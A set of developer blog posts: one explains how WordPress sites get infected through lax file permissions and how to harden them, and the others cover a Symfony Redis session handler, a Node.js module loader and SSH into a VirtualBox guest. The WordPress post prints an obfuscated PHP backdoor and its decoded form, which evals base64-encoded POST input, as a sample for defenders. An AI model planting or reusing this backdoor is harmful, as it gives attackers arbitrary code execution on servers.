How to avoid infected WordPress files by auditing file permissions

Problem overview:

It is true that the WordPress engine has security flaws. It is also true that many WordPress plugins are written without much care for security.

Recently I had to restore many WordPress installations because malicious code had been executed on the servers (for example, sending mail spam via sendmail).

But many hosting providers' server configurations are terrible! And I will explain why.

First: WordPress can be attacked in many ways; we will cover one of them, related to file permissions and wrong server configuration.

An example of malicious code execution

The most common example is the creation of many infected *.php files (like post_3be78.php) that execute code injected via the $_POST request variable. These files have obfuscated content, so they are hard for the human eye to recognize. Example:

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n6769b6'])) {eval($s21(${$s20}['n6769b6']));}?>
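Deobfuscated, the snippet above is a classic backdoor: the character indices into $sF spell out function names ($s21 becomes base64_decode, $s20 becomes _POST). So the code reduces to this reconstruction:

```php
<?php
// Reconstruction of the obfuscated backdoor above.
// $s21 spells "base64_decode" and $s20 spells "_POST", so effectively it runs:
if (isset($_POST['n6769b6'])) {
    // Executes arbitrary attacker-supplied PHP sent in the POST body
    eval(base64_decode($_POST['n6769b6']));
}
```

In other words, any attacker who knows the parameter name can execute arbitrary PHP on the server with a single POST request.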

The infected files may contain more sophisticated content, but you will recognize this kind of code at first glance.

Many hosting providers get this wrong

Why? Because they run PHP scripts as the same user that uploaded the files (the FTP user).

Extremely important fact:
If your scripts are executed as your FTP user, you are in trouble.


How to check if your hosting provider is affected?

  1. Simply create a new directory via FTP.
    Make sure it has the default 755 permissions, meaning only the owner of the directory has permission to write new files into it.
  2. Create a new file test.php with the content below and upload it to that directory:
  3. View the file's output by accessing it via HTTP.
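The original listing for test.php did not survive; a minimal reconstruction consistent with the description below (two var_dump calls: first the writability of the current directory, then the executing user) could be:

```php
<?php
// First check: can the PHP process write into the directory this script lives in?
var_dump(is_writable(__DIR__));

// Second check: which system user is actually executing this script?
var_dump(exec('whoami'));
```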

If the result is bool(true), the script has write access to the directory it resides in. Who agreed to that?

The second var_dump returns the user that executes the script. If this user is the same as your FTP user, the result is expected, because that user is the owner of the created directory and can write any files into it.

What does it mean?

Any script executed on the server has permission to write anywhere. This is a security flaw in the server configuration.

Several years ago it was standard practice to chmod only those directories/files that were actually supposed to be writable.

How to avoid server configuration security flaw?

  1. If you are a hosting provider's customer: you cannot fix this yourself. Ask your administrators to run your PHP scripts as a different user than your FTP user. If they refuse, leave and look for another hosting provider. Wojciech provides such services.
  2. If you are the administrator, just set another user to run your PHP scripts.
    For Apache example:

Edit the file /etc/apache2/envvars (or wherever this file lives on your system):

    export APACHE_RUN_USER=www-data
    export APACHE_RUN_GROUP=www-data
    For Nginx + php-fpm

    Edit your pool configuration:

    user = www-data
    group = www-data

Temporary fix in .htaccess

Most infected files that execute malicious code are fed via $_POST requests. That is because much more code can be sent in an HTTP POST request payload; the size of a GET payload is limited.

You can temporarily disable POST requests to URLs that should not receive them. This blocks all new infected files, because you are creating a whitelist, not a blacklist.

Example .htaccess file; it responds with Error 404 to POST requests on URLs other than /wp-login.php and /wp-admin*:

# BEGIN WordPress

RewriteEngine On
RewriteBase /

# Disable POST requests outside login/admin
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} !^/wp-login\.php [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin [NC]
RewriteRule .* - [R=404,L]

RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

That's all. I hope it helped.

Can I do more?


  1. “Wyczaruj sobie spokój”, Krzysiek Dróżdż (PL)

Symfony2 Redis Session Handler


When you scale a PHP application you have to consider several aspects of the runtime environment, such as:

  • Bytecode caching (e.g. APC, Zend Optimizer Plus, or eAccelerator);
  • Reading project files from RAM instead of HDD;
  • Caching and minifying static content, etc.;
  • One additional aspect: storing sessions.

By default, PHP stores sessions in files. There are also several approaches to speed up session storage, such as memcached or mapping the save_path folder to a ramdisk.

When scaling, it is important that the many worker nodes (running the same deployed application, selected via round-robin or a load balancer) share the same space to store sessions, because in a distributed architecture there is no guarantee that a user's next request will be handled by the same node. This implies that session data has to be shared between nodes; unfortunately, storing it in local RAM does not meet this requirement.

Redis as PHP Session Handler

One additional approach to storing sessions in fast memory is Redis, a key-value store. It can be configured as a centralized or distributed database.

A Redis session handler for PHP is available. To use it:

  1. install Redis as a service
  2. copy/compile the PHP extension
  3. register the extension in your php.ini configuration file
  4. reconfigure session.save_handler in your php.ini configuration file, or set it directly at runtime, e.g.:
ini_set('session.save_handler', 'redis');
ini_set('session.save_path', 'tcp://localhost:6379');
Redis Session Handler in Symfony 2

I am using the Symfony 2 framework. Unfortunately, step 4 alone does not affect the application. You have to register your own SessionHandler in the config.yml file:

framework:
    session:
        handler_id: session_handler_redis

This configuration uses a new SessionHandler registered as the session_handler_redis Symfony service.

We have to write our own SessionHandler. I found a Redis SessionHandler proposed by Andrej Hudec on GitHub, and decided to use and improve his existing implementation.

Declare new SessionHandler class somewhere in your project:

namespace Fokus\Webapp\CommonBundle\SessionHandler;

use Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeSessionHandler;

/**
 * NativeRedisSessionStorage.
 *
 * Driver for the redis session save handler provided by the redis PHP extension.
 *
 * @author Andrej Hudec
 * @author Piotr Pelczar
 */
class NativeRedisSessionHandler extends NativeSessionHandler
{
    /**
     * Constructor.
     *
     * @param string $savePath Path of redis server.
     */
    public function __construct($savePath = "")
    {
        if (!extension_loaded('redis')) {
            throw new \RuntimeException('PHP does not have "redis" session module registered');
        }

        if ("" === $savePath) {
            $savePath = ini_get('session.save_path');
        }

        if ("" === $savePath) {
            $savePath = "tcp://localhost:6379"; // guess path
        }

        ini_set('session.save_handler', 'redis');
        ini_set('session.save_path', $savePath);
    }
}

Now, add the entry that declares the class as a Symfony service in the services.yml file:

session_handler_redis:
    class: Fokus\Webapp\CommonBundle\SessionHandler\NativeRedisSessionHandler
    arguments: ["%session_handler_redis_save_path%"]

I improved Andrej's code so that you can configure the session handler through its constructor and pass the Redis connection string directly in Symfony's services configuration, without touching ini_set or php.ini settings. As you can see, the %session_handler_redis_save_path% parameter is used.

Now, declare the value of parameter in parameters.yml file:

session_handler_redis_save_path: tcp://localhost:6379

That’s all!

Just refresh your page, use the session (for example by logging in) and check if it works. Type in the command line:

    redis-cli KEYS "PHPREDIS_SESSION:*"

to show all keys stored by the PHP session handler. Keys begin with the string PHPREDIS_SESSION:.


Example output:

1) "PHPREDIS_SESSION:s4uvor0u5dcsq5ncgulqiuef14"
2) "PHPREDIS_SESSION:dcu54je80e6feo5rjqvqpv60h7"

Hope it helped!


Node.js – Load modules from a specified directory recursively

Recently I introduced Node.js and the Express framework into my project, which is very modular.

One of its principles is that each piece of functionality is encapsulated in a Controller, known from web application frameworks such as Spring, Zend, or Symfony. A controller is nothing more than a function/method that is executed when a client's HTTP request comes in.

It is very convenient to autoload all controllers from a specified directory and register them in the URL routing registry. Assume that all controllers live in the /src/Controller/ directory.

We could use the fs module from the Node.js standard library and call fs.readdir(path) or fs.readdirSync(path), but these methods do not work recursively. There are many ways to walk through a directory tree, but I used the existing wrench module written by Ryan McGrath.

The usage of my ModuleLoader:

moduleLoader.loadModulesFromDirectory(path, onLoadCallback)

where onLoadCallback is a function(module, moduleName, filePath).


exports.loadModulesFromDirectory = function(dir, onLoadCallback) {
  require('wrench').readdirRecursive(dir, function(error, files) {
    // readdirRecursive calls back multiple times; files === null marks the end
    if (null === files) return;
    for (var i = 0, j = files.length; i < j; ++i) {
      var file = files[i];
      var moduleName = file.substr(0, file.length - 3); // strip the ".js" extension
      var filePath = dir + "/" + file;
      var module = require(filePath);
      onLoadCallback(module, moduleName, filePath);
    }
  });
};

Simple. Let's use this to load our Node.js and Express web application controllers:

1. Create the package.json file:

{
  "name": "hello-world",
  "description": "testapp",
  "dependencies": {
    "express": "3.2.6",
    "wrench": "1.5.1"
  }
}
2. Create the server.js file which will contain our web server:

var express = require('express');
var app = express();
var routes = require('./config/routes');

var port = process.env.port || 3000;

routes.setup(app);

console.log('Starting server at port ' + port);
app.listen(port);

3. Define our ./config/routes.js file:

function setup(app) {
  var moduleLoader = require('ModuleLoader');
  var path = __dirname + "/../src/Controller";
  moduleLoader.loadModulesFromDirectory(path, function(module, moduleName, filePath) {
    var loadingState = "";
    if (typeof module.registerAutoload === 'function') {
      module.registerAutoload(app);
      loadingState = "OK";
    } else {
      loadingState = "FAILED";
    }
    console.log("Loading Controller >> " + moduleName + " >> from file " + filePath + ": " + loadingState + ".");
  });
}

exports.setup = setup;
4. And the last one… create our test controller in ./src/Controller/Test.js:

var actionHello = function(req, res) {
  res.end('Hello! Server date: ' + new Date());
};

exports.registerAutoload = function(app) {
  app.get('/hello', actionHello);
};

If a controller is not intended to be autoloaded, just don't implement the exports.registerAutoload method. This works like autoloading controllers from a specified namespace in the Spring Framework, which looks up classes with the @Controller annotation.

5. Now run our app!

To install all dependencies, use npm (Node Packaged Modules):

npm install

After installing all dependencies, the node_modules directory will be created. Now, just run our app:

node server.js

Now, launch: http://localhost:3000/hello

Pretty, isn’t it?

Hope it helped.


VirtualBox Linux server on Windows

Howdy! Recently I faced the inconvenience of having to develop parts of an application that should be easily configurable on Linux, while installing them on Windows is a nightmare.

What to do when you develop on Windows but need a production environment based on Linux and don't want to buy a server? Install Linux locally and run the server in VirtualBox on Windows. The same story applies when the production server has a lot of messy dependencies that you don't want in your development environment, even if it is Linux.

So how do you connect to a VirtualBox Linux server from Windows?

  1. Download VirtualBox and the Linux distribution you want to install (.iso format will be convenient). I chose Ubuntu because of its rapid installation.

  2. Create a new virtual machine for your Linux.
  3. Mount your .iso and install Linux on VirtualBox. Installation is really user-friendly.
  4. Now go to your virtual machine's settings -> network adapter settings -> and set the adapter to Bridged Adapter, so the guest gets an IP address reachable from the host (with plain NAT, the guest is not directly reachable unless you add a port-forwarding rule).
  5. Check that everything is OK, in particular that the network adapter in the virtual machine obtained an IP address. Just type:


    /sbin/ifconfig | grep addr

    Note the assigned IP address.

  6. Try to ping your virtual machine from the host operating system, where VirtualBox is running:
    ping virtual_machine_ip_address
  7. If everything is OK, your machines can reach each other. Now install the OpenSSH server on your Linux. For Ubuntu:
    sudo apt-get install openssh-server
  8. Now you can open a connection from your host machine. On Windows, you can use PuTTY to connect to the virtual machine's command line.
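If you kept the adapter in NAT mode instead, the guest is not directly reachable from the host and you need a port-forwarding rule first (a sketch; the VM name "UbuntuServer" and the rule name are placeholders for your own values):

```shell
# Forward host port 2222 to the guest's SSH port 22 (run while the VM is powered off)
VBoxManage modifyvm "UbuntuServer" --natpf1 "guestssh,tcp,,2222,,22"

# Then connect to 127.0.0.1:2222 with PuTTY, or from any OpenSSH client:
ssh -p 2222 your_user@127.0.0.1
```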

My Ubuntu command line accessed from Windows 8. Locally.


Happy codin'!